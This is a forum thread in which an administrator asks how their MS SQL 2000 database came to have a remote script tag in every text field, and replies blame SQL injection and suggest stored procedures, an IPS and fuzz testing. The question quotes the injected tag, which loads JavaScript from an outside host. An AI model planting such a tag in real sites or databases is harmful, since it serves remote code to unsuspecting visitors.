We help IT Professionals succeed at work.

How do I find out who hacked into my database

bella28
bella28 asked
on
I have a MS SQL 2000 database that we use for a LMS. Walked into work this morning to discover that every text field in every table in this database had the following line of code:

<script src=http://2677.in/yahoo.js></script>

I had to restore the database from the previous evening, and now everything is working fine. How do I prevent this from happening again? And what the heck is this? Google did not return very many results. I know it's a javascript, but where did it come from?

I am running Windows Server 2003 with SQL 2000.
Comment
Watch Question

Awarded 2008
Awarded 2008
Commented:
this likely happened because your front end code (likely a web app) is written in such a way so that it is suspectible to sql injection.  that code needs to be fixed to call stored procedures.
Commented:
Install an IPS solution.
Agreed with chap. You can use a SQL Fuzzer to test web apps for sql injection vulnerability.